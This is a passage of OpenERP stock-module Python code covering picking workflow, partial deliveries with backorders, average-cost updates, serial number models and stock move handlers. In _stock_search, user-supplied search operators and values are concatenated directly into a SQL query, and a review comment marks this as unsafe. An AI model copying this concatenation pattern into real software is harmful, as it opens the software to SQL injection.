            'invoice_state': 'invoiced',
            }, context=context)
        return res

    def test_done(self, cr, uid, ids, context=None):
        """ Workflow test: every move is done or cancelled, with at least one done.

        Pickings without moves pass immediately.
        @return: True or False
        """
        any_done = False
        for picking in self.browse(cr, uid, ids, context=context):
            if not picking.move_lines:
                return True
            for move in picking.move_lines:
                if move.state not in ('cancel', 'done'):
                    return False
                if move.state == 'done':
                    any_done = True
        return any_done

    def test_cancel(self, cr, uid, ids, context=None):
        """ Workflow test: True only when every move of every picking is cancelled.
        @return: True or False
        """
        for picking in self.browse(cr, uid, ids, context=context):
            for move in picking.move_lines:
                if move.state != 'cancel':
                    return False
        return True

    def allow_cancel(self, cr, uid, ids, context=None):
        """Check that the pickings may be cancelled; any done move forbids it.
        @raise osv.except_osv: when a move of a picking is already done
        @return: True
        """
        for picking in self.browse(cr, uid, ids, context=context):
            if not picking.move_lines:
                return True
            for move in picking.move_lines:
                if move.state == 'done':
                    raise osv.except_osv(_('Error!'), _('You cannot cancel the picking as some moves have been done. You should cancel the picking lines.'))
        return True

    def unlink(self, cr, uid, ids, context=None):
        """Delete pickings after cancelling and removing their moves.

        Done or cancelled pickings cannot be removed; non-draft pickings have
        their moves cancelled first so product virtual stock is updated.
        @return: result of the base unlink
        """
        if context is None:
            context = {}
        move_obj = self.pool.get('stock.move')
        for picking in self.browse(cr, uid, ids, context=context):
            if picking.state in ('done', 'cancel'):
                raise osv.except_osv(_('Error!'), _('You cannot remove the picking which is in %s state!')%(picking.state,))
            move_ids = [move.id for move in picking.move_lines]
            ctx = dict(context, call_unlink=True)
            if picking.state != 'draft':
                #Cancelling the move in order to affect Virtual stock of product
                move_obj.action_cancel(cr, uid, move_ids, ctx)
            #Removing the move
            move_obj.unlink(cr, uid, move_ids, ctx)

        return super(stock_picking, self).unlink(cr, uid, ids, context=context)

    # FIXME: needs refactoring, this code is partially duplicated in stock_move.do_partial()!
    def do_partial(self, cr, uid, ids, partial_datas, context=None):
        """ Makes partial picking and moves done.

        @param partial_datas: dictionary keyed by 'move<id>' for each move of the
            pickings; each entry is a dict that may carry 'product_qty',
            'product_uom', 'product_price', 'product_currency' and 'prodlot_id'.
        @return: {picking_id: {'delivered_picking': id of the picking that was
            actually processed (the split picking when a backorder was made)}}
        """
        if context is None:
            context = {}
        else:
            # Work on a copy: 'currency_id' is injected into it below.
            context = dict(context)
        res = {}
        move_obj = self.pool.get('stock.move')
        product_obj = self.pool.get('product.product')
        currency_obj = self.pool.get('res.currency')
        uom_obj = self.pool.get('product.uom')
        sequence_obj = self.pool.get('ir.sequence')
        wf_service = netsvc.LocalService("workflow")
        for pick in self.browse(cr, uid, ids, context=context):
            new_picking = None
            # Classify each move against the quantity entered in the wizard:
            #   complete: processed qty == move qty
            #   too_few:  processed qty <  move qty (the rest stays on a backorder)
            #   too_many: processed qty >  move qty
            complete, too_many, too_few = [], [], []
            move_product_qty, prodlot_ids, product_avail, partial_qty, product_uoms = {}, {}, {}, {}, {}
            for move in pick.move_lines:
                if move.state in ('done', 'cancel'):
                    continue
                partial_data = partial_datas.get('move%s'%(move.id), {})
                product_qty = partial_data.get('product_qty',0.0)
                move_product_qty[move.id] = product_qty
                product_uom = partial_data.get('product_uom',False)
                product_price = partial_data.get('product_price',0.0)
                product_currency = partial_data.get('product_currency',False)
                prodlot_id = partial_data.get('prodlot_id')
                prodlot_ids[move.id] = prodlot_id
                product_uoms[move.id] = product_uom
                # Processed quantity converted into the move's own UoM for comparison.
                partial_qty[move.id] = uom_obj._compute_qty(cr, uid, product_uoms[move.id], product_qty, move.product_uom.id)
                if move.product_qty == partial_qty[move.id]:
                    complete.append(move)
                elif move.product_qty > partial_qty[move.id]:
                    too_few.append(move)
                else:
                    too_many.append(move)

                # Average price computation
                if (pick.type == 'in') and (move.product_id.cost_method == 'average'):
                    product = product_obj.browse(cr, uid, move.product_id.id)
                    move_currency_id = move.company_id.currency_id.id
                    context['currency_id'] = move_currency_id
                    qty = uom_obj._compute_qty(cr, uid, product_uom, product_qty, product.uom_id.id)

                    if product.id not in product_avail:
                        # keep track of stock on hand including processed lines not yet marked as done
                        product_avail[product.id] = product.qty_available

                    if qty > 0:
                        # Price entered in the wizard, converted to company currency
                        # and to the product's reference UoM.
                        new_price = currency_obj.compute(cr, uid, product_currency,
                                move_currency_id, product_price, round=False)
                        new_price = uom_obj._compute_price(cr, uid, product_uom, new_price,
                                product.uom_id.id)
                        if product_avail[product.id] <= 0:
                            product_avail[product.id] = 0
                            new_std_price = new_price
                        else:
                            # Get the standard price
                            amount_unit = product.price_get('standard_price', context=context)[product.id]
                            # Weighted average between stock on hand and incoming qty.
                            new_std_price = ((amount_unit * product_avail[product.id])\
                                + (new_price * qty))/(product_avail[product.id] + qty)
                        # Write the field according to price type field
                        product_obj.write(cr, uid, [product.id], {'standard_price': new_std_price})

                        # Record the values that were chosen in the wizard, so they can be
                        # used for inventory valuation if real-time valuation is enabled.
                        move_obj.write(cr, uid, [move.id],
                                {'price_unit': product_price,
                                 'price_currency_id': product_currency})

                        product_avail[product.id] += qty



            for move in too_few:
                product_qty = move_product_qty[move.id]
                if not new_picking:
                    # Split: the original picking is renamed with a fresh sequence
                    # number and a copy keeping the original name receives the
                    # processed moves.
                    new_picking_name = pick.name
                    self.write(cr, uid, [pick.id],
                               {'name': sequence_obj.get(cr, uid,
                                            'stock.picking.%s'%(pick.type)),
                               })
                    new_picking = self.copy(cr, uid, pick.id,
                            {
                                'name': new_picking_name,
                                'move_lines' : [],
                                'state':'draft',
                            })
                if product_qty != 0:
                    # Copy of the move carrying the processed part, attached to the split picking.
                    defaults = {
                            'product_qty' : product_qty,
                            'product_uos_qty': product_qty, #TODO: put correct uos_qty
                            'picking_id' : new_picking,
                            'state': 'assigned',
                            'move_dest_id': False,
                            'price_unit': move.price_unit,
                            'product_uom': product_uoms[move.id]
                    }
                    prodlot_id = prodlot_ids[move.id]
                    if prodlot_id:
                        defaults.update(prodlot_id=prodlot_id)
                    move_obj.copy(cr, uid, move.id, defaults)
                # The original move keeps only the remaining quantity.
                move_obj.write(cr, uid, [move.id],
                        {
                            'product_qty': move.product_qty - partial_qty[move.id],
                            'product_uos_qty': move.product_qty - partial_qty[move.id], #TODO: put correct uos_qty
                            'prodlot_id': False,
                            'tracking_id': False,
                        })

            if new_picking:
                # Fully-processed moves go along to the split picking.
                move_obj.write(cr, uid, [c.id for c in complete], {'picking_id': new_picking})
            for move in complete:
                defaults = {'product_uom': product_uoms[move.id], 'product_qty': move_product_qty[move.id]}
                if prodlot_ids.get(move.id):
                    defaults.update({'prodlot_id': prodlot_ids[move.id]})
                move_obj.write(cr, uid, [move.id], defaults)
            for move in too_many:
                # Over-processed moves are bumped up to the quantity actually done.
                product_qty = move_product_qty[move.id]
                defaults = {
                    'product_qty' : product_qty,
                    'product_uos_qty': product_qty, #TODO: put correct uos_qty
                    'product_uom': product_uoms[move.id]
                }
                prodlot_id = prodlot_ids.get(move.id)
                if prodlot_ids.get(move.id):
                    defaults.update(prodlot_id=prodlot_id)
                if new_picking:
                    defaults.update(picking_id=new_picking)
                move_obj.write(cr, uid, [move.id], defaults)

            # At first we confirm the new picking (if necessary)
            if new_picking:
                wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_confirm', cr)
                # Then we finish the good picking
                self.write(cr, uid, [pick.id], {'backorder_id': new_picking})
                self.action_move(cr, uid, [new_picking], context=context)
                wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_done', cr)
                wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
                delivered_pack_id = pick.id
                back_order_name = self.browse(cr, uid, delivered_pack_id, context=context).name
                self.message_post(cr, uid, new_picking, body=_("Back order <em>%s</em> has been <b>created</b>.") % (back_order_name), context=context)
            else:
                # No split needed: process the picking as a whole.
                self.action_move(cr, uid, [pick.id], context=context)
                wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_done', cr)
                delivered_pack_id = pick.id

            delivered_pack = self.browse(cr, uid, delivered_pack_id, context=context)
            res[pick.id] = {'delivered_picking': delivered_pack.id or False}

        return res
    
    # views associated to each picking type
    _VIEW_LIST = {
        'out': 'view_picking_out_form',
        'in': 'view_picking_in_form',
        'internal': 'view_picking_form',
    }
    def _get_view_id(self, cr, uid, type):
        """Get the view id suiting the given type

        @param type: the picking type as a string
        @return: view id, or False if no view found
        """
        # Unknown types fall back to the generic internal picking form.
        res = self.pool.get('ir.model.data').get_object_reference(cr, uid,
            'stock', self._VIEW_LIST.get(type, 'view_picking_form'))
        return res and res[1] or False


class stock_production_lot(osv.osv):

    def name_get(self, cr, uid, ids, context=None):
        """ Display name built as "[prefix/]name [ref]". """
        if not ids:
            return []
        reads = self.read(cr, uid, ids, ['name', 'prefix', 'ref'], context)
        res = []
        for record in reads:
            name = record['name']
            prefix = record['prefix']
            if prefix:
                name = prefix + '/' + name
            if record['ref']:
                name = '%s [%s]' % (name, record['ref'])
            res.append((record['id'], name))
        return res

    def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
        """ Search on an exact prefix match first, then fall back to the name field. """
        args = args or []
        ids = []
        if name:
            ids = self.search(cr, uid, [('prefix', '=', name)] + args, limit=limit, context=context)
            if not ids:
                ids = self.search(cr, uid, [('name', operator, name)] + args, limit=limit, context=context)
        else:
            ids = self.search(cr, uid, args, limit=limit, context=context)
        return self.name_get(cr, uid, ids, context)

    _name = 'stock.production.lot'
    _description = 'Serial Number'

    def _get_stock(self, cr, uid, ids, field_name, arg, context=None):
        """ Function field getter: available quantity per serial number.

        Sums quantities over context['location_id'] when given, otherwise over
        all internal locations.
        @return: {lot_id: quantity}
        """
        if context is None:
            context = {}
        if 'location_id' not in context:
            locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')], context=context)
        else:
            locations = context['location_id'] and [context['location_id']] or []

        if isinstance(ids, (int, long)):
            ids = [ids]

        # Default every requested id to 0.0 so lots without stock still appear.
        res = {}.fromkeys(ids, 0.0)
        if locations:
            cr.execute('''select
                    prodlot_id,
                    sum(qty)
                from
                    stock_report_prodlots
                where
                    location_id IN %s and prodlot_id IN %s group by prodlot_id''',(tuple(locations),tuple(ids),))
            res.update(dict(cr.fetchall()))

        return res

    def _stock_search(self, cr, uid, obj, name, args, context=None):
        """ Search implementation for the 'stock_available' function field.
        @return: a [('id', 'in', ids)] domain matching the requested quantity condition
        """
        locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')])
        # NOTE(review): the operator and value from args[0] are concatenated
        # straight into the SQL string — only safe if callers restrict them to
        # valid comparison operators and numbers; confirm before reuse.
        cr.execute('''select
                prodlot_id,
                sum(qty)
            from
                stock_report_prodlots
            where
                location_id IN %s group by prodlot_id
            having  sum(qty) '''+ str(args[0][1]) + str(args[0][2]),(tuple(locations),))
        res = cr.fetchall()
        ids = [('id', 'in', map(lambda x: x[0], res))]
        return ids

    _columns = {
        'name': fields.char('Serial Number', size=64, required=True, help="Unique Serial Number, will be displayed as: PREFIX/SERIAL [INT_REF]"),
        'ref': fields.char('Internal Reference', size=256, help="Internal reference number in case it differs from the manufacturer's serial number"),
        'prefix': fields.char('Prefix', size=64, help="Optional prefix to prepend when displaying this serial number: PREFIX/SERIAL [INT_REF]"),
        'product_id': fields.many2one('product.product', 'Product', required=True, domain=[('type', '<>', 'service')]),
        'date': fields.datetime('Creation Date', required=True),
        'stock_available': fields.function(_get_stock, fnct_search=_stock_search, type="float", string="Available", select=True,
            help="Current quantity of products with this Serial Number available in company warehouses",
            digits_compute=dp.get_precision('Product Unit of Measure')),
        'revisions': fields.one2many('stock.production.lot.revision', 'lot_id', 'Revisions'),
        'company_id': fields.many2one('res.company', 'Company', select=True),
        'move_ids': fields.one2many('stock.move', 'prodlot_id', 'Moves for this serial number', readonly=True),
    }
    _defaults = {
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        # lambda args follow the (self, cr, uid, context) defaults convention
        'name': lambda x, y, z, c: x.pool.get('ir.sequence').get(y, z, 'stock.lot.serial'),
        'product_id': lambda x, y, z, c: c.get('product_id', False),
    }
    _sql_constraints = [
        ('name_ref_uniq', 'unique (name, ref)', 'The combination of Serial Number and internal reference must be unique !'),
    ]
    def action_traceability(self, cr, uid, ids, context=None):
        """ It traces the information of a product
        @param self: The object pointer.
        @param cr: A database cursor
        @param uid: ID of the user currently logged in
        @param ids: List of IDs selected
        @param context: A standard dictionary
        @return: A dictionary of values
        """
        value=self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)
        return value

    def copy(self, cr, uid, id, default=None, context=None):
        """ Duplicate a lot with a fresh creation date and without its moves. """
        context = context or {}
        default = default and default.copy() or {}
        default.update(date=time.strftime('%Y-%m-%d %H:%M:%S'), move_ids=[])
        return super(stock_production_lot, self).copy(cr, uid, id, default=default, context=context)

# old-style OpenERP model registration (instantiation registers the class in the pool)
stock_production_lot()

class stock_production_lot_revision(osv.osv):
    # Revision history attached to a serial number (free-form name/description/date).
    _name = 'stock.production.lot.revision'
    _description = 'Serial Number Revision'

    _columns = {
        'name': fields.char('Revision Name', size=64, required=True),
        'description': fields.text('Description'),
        'date': fields.date('Revision Date'),
        'indice': fields.char('Revision Number', size=16),
        'author_id': fields.many2one('res.users', 'Author'),
        'lot_id': fields.many2one('stock.production.lot', 'Serial Number', select=True, ondelete='cascade'),
        'company_id': fields.related('lot_id','company_id',type='many2one',relation='res.company',string='Company', store=True, readonly=True),
    }

    _defaults = {
        # defaults lambda args are (self, cr, uid, context); z is the current uid
        'author_id': lambda x, y, z, c: z,
        'date': fields.date.context_today,
    }

# old-style OpenERP model registration
stock_production_lot_revision()

# ----------------------------------------------------
# Move
# ----------------------------------------------------

#
# Fields:
#   location_dest_id is only used for predicting future stocks
#
class stock_move(osv.osv):

    def _getSSCC(self, cr, uid, context=None):
        """ Return the id of the latest stock.tracking record created by this user, or False. """
        cr.execute('select id from stock_tracking where create_uid=%s order by id desc limit 1', (uid,))
        row = cr.fetchone()
        return row[0] if row and row[0] else False

    _name = "stock.move"
    _description = "Stock Move"
    # Latest expected date first; 'id' breaks ties between moves sharing a date.
    _order = 'date_expected desc, id'
    # NOTE(review): presumably disables the ORM's automatic creation log entries — confirm.
    _log_create = False

    def action_partial_move(self, cr, uid, ids, context=None):
        """ Launch the 'stock.partial.move' wizard on the given moves.
        @return: an act_window action dictionary opening the wizard in a popup
        """
        if context is None:
            context = {}
        if context.get('active_model') != self._name:
            # Make sure the wizard sees these moves as its active records.
            context.update(active_model=self._name, active_ids=ids)
        wizard_id = self.pool.get("stock.partial.move").create(cr, uid, {}, context=context)
        action = {
            'name': _("Products to Process"),
            'view_mode': 'form',
            'view_id': False,
            'view_type': 'form',
            'res_model': 'stock.partial.move',
            'res_id': wizard_id,
            'type': 'ir.actions.act_window',
            'nodestroy': True,
            'target': 'new',
            'domain': '[]',
            'context': context,
        }
        return action


    def name_get(self, cr, uid, ids, context=None):
        """ Display name: "[product_code: ][picking_origin/ ]source > destination". """
        result = []
        for move in self.browse(cr, uid, ids, context=context):
            label = move.location_id.name + ' > ' + move.location_dest_id.name
            # optional prefixes
            if move.product_id.code:
                label = move.product_id.code + ': ' + label
            if move.picking_id.origin:
                label = move.picking_id.origin + '/ ' + label
            result.append((move.id, label))
        return result

    def _check_tracking(self, cr, uid, ids, context=None):
        """ Constraint: a done move of a tracked product must carry a serial number.
        @return: True or False
        """
        for move in self.browse(cr, uid, ids, context=context):
            if move.prodlot_id or move.state != 'done':
                continue
            product = move.product_id
            needs_lot = (
                (product.track_production and move.location_id.usage == 'production') or
                (product.track_production and move.location_dest_id.usage == 'production') or
                (product.track_incoming and move.location_id.usage == 'supplier') or
                (product.track_outgoing and move.location_dest_id.usage == 'customer') or
                (product.track_incoming and move.location_id.usage == 'inventory')
            )
            if needs_lot:
                return False
        return True

    def _check_product_lot(self, cr, uid, ids, context=None):
        """ Constraint: the serial number of a done move must belong to the moved product.
        @return: True or False
        """
        for move in self.browse(cr, uid, ids, context=context):
            if move.state != 'done' or not move.prodlot_id:
                continue
            if move.prodlot_id.product_id.id != move.product_id.id:
                return False
        return True

    # Field definitions; most fields become read-only once the move is done.
    _columns = {
        'name': fields.char('Description', required=True, select=True),
        'priority': fields.selection([('0', 'Not urgent'), ('1', 'Urgent')], 'Priority'),
        'create_date': fields.datetime('Creation Date', readonly=True, select=True),
        'date': fields.datetime('Date', required=True, select=True, help="Move date: scheduled date until move is done, then date of actual move processing", states={'done': [('readonly', True)]}),
        'date_expected': fields.datetime('Scheduled Date', states={'done': [('readonly', True)]},required=True, select=True, help="Scheduled date for the processing of this move"),
        'product_id': fields.many2one('product.product', 'Product', required=True, select=True, domain=[('type','<>','service')],states={'done': [('readonly', True)]}),

        # quantities and units
        'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'),
            required=True,states={'done': [('readonly', True)]},
            help="This is the quantity of products from an inventory "
                "point of view. For moves in the state 'done', this is the "
                "quantity of products that were actually moved. For other "
                "moves, this is the quantity of product that is planned to "
                "be moved. Lowering this quantity does not generate a "
                "backorder. Changing this quantity on assigned moves affects "
                "the product reservation, and should be done with care."
        ),
        'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True,states={'done': [('readonly', True)]}),
        'product_uos_qty': fields.float('Quantity (UOS)', digits_compute=dp.get_precision('Product Unit of Measure'), states={'done': [('readonly', True)]}),
        'product_uos': fields.many2one('product.uom', 'Product UOS', states={'done': [('readonly', True)]}),
        'product_packaging': fields.many2one('product.packaging', 'Packaging', help="It specifies attributes of packaging like type, quantity of packaging,etc."),

        # source / destination
        'location_id': fields.many2one('stock.location', 'Source Location', required=True, select=True,states={'done': [('readonly', True)]}, help="Sets a location if you produce at a fixed location. This can be a partner location if you subcontract the manufacturing operations."),
        'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True,states={'done': [('readonly', True)]}, select=True, help="Location where the system will stock the finished products."),
        'partner_id': fields.many2one('res.partner', 'Destination Address ', states={'done': [('readonly', True)]}, help="Optional address where goods are to be delivered, specifically used for allotment"),

        # traceability
        'prodlot_id': fields.many2one('stock.production.lot', 'Serial Number', states={'done': [('readonly', True)]}, help="Serial number is used to put a serial number on the production", select=True),
        'tracking_id': fields.many2one('stock.tracking', 'Pack', select=True, states={'done': [('readonly', True)]}, help="Logistical shipping unit: pallet, box, pack ..."),

        'auto_validate': fields.boolean('Auto Validate'),

        # chaining and history
        'move_dest_id': fields.many2one('stock.move', 'Destination Move', help="Optional: next stock move when chaining them", select=True),
        'move_history_ids': fields.many2many('stock.move', 'stock_move_history_ids', 'parent_id', 'child_id', 'Move History (child moves)'),
        'move_history_ids2': fields.many2many('stock.move', 'stock_move_history_ids', 'child_id', 'parent_id', 'Move History (parent moves)'),
        'picking_id': fields.many2one('stock.picking', 'Reference', select=True,states={'done': [('readonly', True)]}),
        'note': fields.text('Notes'),
        'state': fields.selection([('draft', 'New'),
                                   ('cancel', 'Cancelled'),
                                   ('waiting', 'Waiting Another Move'),
                                   ('confirmed', 'Waiting Availability'),
                                   ('assigned', 'Available'),
                                   ('done', 'Done'),
                                   ], 'Status', readonly=True, select=True,
                 help= "* New: When the stock move is created and not yet confirmed.\n"\
                       "* Waiting Another Move: This state can be seen when a move is waiting for another one, for example in a chained flow.\n"\
                       "* Waiting Availability: This state is reached when the procurement resolution is not straight forward. It may need the scheduler to run, a component to me manufactured...\n"\
                       "* Available: When products are reserved, it is set to \'Available\'.\n"\
                       "* Done: When the shipment is processed, the state is \'Done\'."),
        'price_unit': fields.float('Unit Price', digits_compute= dp.get_precision('Product Price'), help="Technical field used to record the product cost set by the user during a picking confirmation (when average price costing method is used)"),
        'price_currency_id': fields.many2one('res.currency', 'Currency for average price', help="Technical field used to record the currency chosen by the user during a picking confirmation (when average price costing method is used)"),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
        'backorder_id': fields.related('picking_id','backorder_id',type='many2one', relation="stock.picking", string="Back Order of", select=True),
        'origin': fields.related('picking_id','origin',type='char', size=64, relation="stock.picking", string="Source", store=True),

        # used for colors in tree views:
        'scrapped': fields.related('location_dest_id','scrap_location',type='boolean',relation='stock.location',string='Scrapped', readonly=True),
        'type': fields.related('picking_id', 'type', type='selection', selection=[('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], string='Shipping Type'),
    }

    def _check_location(self, cr, uid, ids, context=None):
        """ Constraint: a done move may not use a 'view'-type location on either side. """
        for record in self.browse(cr, uid, ids, context=context):
            if record.state != 'done':
                continue
            if record.location_id.usage == 'view':
                raise osv.except_osv(_('Error'), _('You cannot move product %s from a location of type view %s.')% (record.product_id.name, record.location_id.name))
            if record.location_dest_id.usage == 'view':
                raise osv.except_osv(_('Error'), _('You cannot move product %s to a location of type view %s.')% (record.product_id.name, record.location_dest_id.name))
        return True

    # Model-level constraints: each entry is (checker method, error message,
    # list of fields whose modification triggers the check).
    _constraints = [
        (_check_tracking,
            'You must assign a serial number for this product.',
            ['prodlot_id']),
        (_check_location, 'You cannot move products from or to a location of the type view.',
            ['location_id','location_dest_id']),
        (_check_product_lot,
            'You try to assign a lot which is not from the same product.',
            ['prodlot_id'])]

    def _default_location_destination(self, cr, uid, context=None):
        """ Gets default address of partner for destination location
        @return: Address id or False
        """
        mod_obj = self.pool.get('ir.model.data')
        picking_type = context.get('picking_type')
        location_id = False
        if context is None:
            context = {}
        if context.get('move_line', []):
            if context['move_line'][0]:
                if isinstance(context['move_line'][0], (tuple, list)):
                    location_id = context['move_line'][0][2] and context['move_line'][0][2].get('location_dest_id',False)
                else:
                    move_list = self.pool.get('stock.move').read(cr, uid, context['move_line'][0], ['location_dest_id'])
                    location_id = move_list and move_list['location_dest_id'][0] or False
        elif context.get('address_out_id', False):
            property_out = self.pool.get('res.partner').browse(cr, uid, context['address_out_id'], context).property_stock_customer
            location_id = property_out and property_out.id or False
        else:
            location_xml_id = False
            if picking_type in ('in', 'internal'):
                location_xml_id = 'stock_location_stock'
            elif picking_type == 'out':
                location_xml_id = 'stock_location_customers'
            if location_xml_id:
                try:
                    location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
                    with tools.mute_logger('openerp.osv.orm'):
                        self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
                except (orm.except_orm, ValueError):
                    location_id = False

        return location_id

    def _default_location_source(self, cr, uid, context=None):
        """ Gets default address of partner for source location
        @return: Address id or False
        """
        mod_obj = self.pool.get('ir.model.data')
        picking_type = context.get('picking_type')
        location_id = False

        if context is None:
            context = {}
        if context.get('move_line', []):
            try:
                location_id = context['move_line'][0][2]['location_id']
            except:
                pass
        elif context.get('address_in_id', False):
            part_obj_add = self.pool.get('res.partner').browse(cr, uid, context['address_in_id'], context=context)
            if part_obj_add:
                location_id = part_obj_add.property_stock_supplier.id
        else:
            location_xml_id = False
            if picking_type == 'in':
                location_xml_id = 'stock_location_suppliers'
            elif picking_type in ('out', 'internal'):
                location_xml_id = 'stock_location_stock'
            if location_xml_id:
                try:
                    location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
                    with tools.mute_logger('openerp.osv.orm'):
                        self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
                except (orm.except_orm, ValueError):
                    location_id = False

        return location_id

    def _default_destination_address(self, cr, uid, context=None):
        """ Default delivery address: the partner of the current user's company. """
        current_user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
        return current_user.company_id.partner_id.id

    def _default_move_type(self, cr, uid, context=None):
        """ Gets default type of move
        @return: type
        """
        if context is None:
            context = {}
        picking_type = context.get('picking_type')
        type = 'internal'
        if picking_type == 'in':
            type = 'in'
        elif picking_type == 'out':
            type = 'out'
        return type

    # Default values for new moves; both dates default to the creation time.
    _defaults = {
        'location_id': _default_location_source,
        'location_dest_id': _default_location_destination,
        'partner_id': _default_destination_address,
        'type': _default_move_type,
        'state': 'draft',
        'priority': '1',
        'product_qty': 1.0,
        'scrapped' :  False,
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.move', context=c),
        'date_expected': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
    }

    def write(self, cr, uid, ids, vals, context=None):
        """ Forbid non-administrator edits of quantity/UoM/product/location
        fields on moves that are already done.
        """
        if isinstance(ids, (int, long)):
            ids = [ids]
        if uid != 1:
            protected = set(['product_qty', 'product_uom', 'product_uos_qty', 'product_uos', 'location_id', 'location_dest_id', 'product_id'])
            for move in self.browse(cr, uid, ids, context=context):
                if move.state == 'done' and protected.intersection(vals):
                    raise osv.except_osv(_('Operation Forbidden!'),
                                         _('Quantities, Units of Measure, Products and Locations cannot be modified on stock moves that have already been processed (except by the Administrator).'))
        return  super(stock_move, self).write(cr, uid, ids, vals, context=context)

    def copy(self, cr, uid, id, default=None, context=None):
        """ Duplicate a move without carrying over its move-history links. """
        values = dict(default or {}, move_history_ids=[], move_history_ids2=[])
        return super(stock_move, self).copy(cr, uid, id, values, context=context)

    def _auto_init(self, cursor, context=None):
        """ Standard schema initialization, plus creation of a composite index
        on (product_id, state, location_id, location_dest_id) if it is missing.
        """
        res = super(stock_move, self)._auto_init(cursor, context=context)
        cursor.execute('SELECT indexname \
                FROM pg_indexes \
                WHERE indexname = \'stock_move_location_id_location_dest_id_product_id_state\'')
        if not cursor.fetchone():
            cursor.execute('CREATE INDEX stock_move_location_id_location_dest_id_product_id_state \
                    ON stock_move (product_id, state, location_id, location_dest_id)')
        return res

    def onchange_lot_id(self, cr, uid, ids, prodlot_id=False, product_qty=False,
                        loc_id=False, product_id=False, uom_id=False, context=None):
        """ Warn when moving more of a serial number than is available at the
        source location.
        @param prodlot_id: changed production lot id
        @param product_qty: quantity being moved
        @param loc_id: source location id
        @param product_id: product id
        @param uom_id: unit of measure id of the move
        @return: {'warning': {...}} — empty warning dict when stock suffices
        """
        if not prodlot_id or not loc_id:
            return {}
        ctx = dict(context or {}, location_id=loc_id)
        ctx['raise-exception'] = True
        uom_obj = self.pool.get('product.uom')
        product_obj = self.pool.get('product.product')
        product_uom = product_obj.browse(cr, uid, product_id, context=ctx).uom_id
        prodlot = self.pool.get('stock.production.lot').browse(cr, uid, prodlot_id, context=ctx)
        location = self.pool.get('stock.location').browse(cr, uid, loc_id, context=ctx)
        uom = uom_obj.browse(cr, uid, uom_id, context=ctx)
        # Lot availability converted into the move's unit of measure.
        available = uom_obj._compute_qty_obj(cr, uid, product_uom, prodlot.stock_available, uom, context=ctx)
        warning = {}
        if location.usage == 'internal' and product_qty > (available or 0.0):
            warning = {
                'title': _('Insufficient Stock for Serial Number !'),
                'message': _('You are moving %.2f %s but only %.2f %s available for this serial number.') % (product_qty, uom.name, available, uom.name)
            }
        return {'warning': warning}

    def onchange_quantity(self, cr, uid, ids, product_id, product_qty,
                          product_uom, product_uos):
        """Recompute the UoS quantity after the UoM quantity was edited.

        @param product_id: Product id
        @param product_qty: Changed Quantity of product
        @param product_uom: Unit of measure of product
        @param product_uos: Unit of sale of product
        @return: onchange dict with 'value' (and possibly 'warning') keys
        """
        result = {
            'product_uos_qty': 0.00
        }
        warning = {}

        if (not product_id) or (product_qty <= 0.0):
            result['product_qty'] = 0.0
            return {'value': result}

        product_obj = self.pool.get('product.product')
        uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])

        # Warn if the quantity was decreased: OpenERP takes the new quantity
        # as final and will not create a back order.
        # FIX: the break previously sat at loop level (outside the if), so
        # only the first move was ever inspected; it now sits inside the
        # condition, mirroring onchange_uos_quantity() below.
        if ids:
            for move in self.read(cr, uid, ids, ['product_qty']):
                if product_qty < move['product_qty']:
                    warning.update({
                        'title': _('Information'),
                        'message': _("By changing this quantity here, you accept the "
                                     "new quantity as complete: OpenERP will not "
                                     "automatically generate a back order.")})
                    break

        if product_uos and product_uom and (product_uom != product_uos):
            result['product_uos_qty'] = product_qty * uos_coeff['uos_coeff']
        else:
            result['product_uos_qty'] = product_qty

        return {'value': result, 'warning': warning}

    def onchange_uos_quantity(self, cr, uid, ids, product_id, product_uos_qty,
                          product_uos, product_uom):
        """Recompute the UoM quantity after the UoS quantity was edited.

        @param product_id: Product id
        @param product_uos_qty: Changed UoS Quantity of product
        @param product_uom: Unit of measure of product
        @param product_uos: Unit of sale of product
        @return: onchange dict with 'value' (and possibly 'warning') keys
        """
        result = {'product_qty': 0.00}
        warning = {}

        if not product_id or product_uos_qty <= 0.0:
            result['product_uos_qty'] = 0.0
            return {'value': result}

        uos_coeff = self.pool.get('product.product').read(cr, uid, product_id, ['uos_coeff'])

        # A decreased quantity is taken as final: warn that no back order
        # will be generated automatically.
        for move in self.read(cr, uid, ids, ['product_uos_qty']):
            if product_uos_qty < move['product_uos_qty']:
                warning['title'] = _('Warning: No Back Order')
                warning['message'] = _("By changing the quantity here, you accept the "
                                "new quantity as complete: OpenERP will not "
                                "automatically generate a Back Order.")
                break

        if product_uos and product_uom and product_uom != product_uos:
            result['product_qty'] = product_uos_qty / uos_coeff['uos_coeff']
        else:
            result['product_qty'] = product_uos_qty
        return {'value': result, 'warning': warning}

    def onchange_product_id(self, cr, uid, ids, prod_id=False, loc_id=False,
                            loc_dest_id=False, partner_id=False):
        """Fill in UoM/UoS, default quantities, name and locations when the
        product changes.

        @param prod_id: Changed Product id
        @param loc_id: Source location id
        @param loc_dest_id: Destination location id
        @param partner_id: Address id of partner
        @return: onchange dict of default values
        """
        if not prod_id:
            return {}
        # Prefer the partner's language for product naming, falling back to
        # the current user's language.
        user_rec = self.pool.get('res.users').browse(cr, uid, uid)
        lang = user_rec and user_rec.lang or False
        if partner_id:
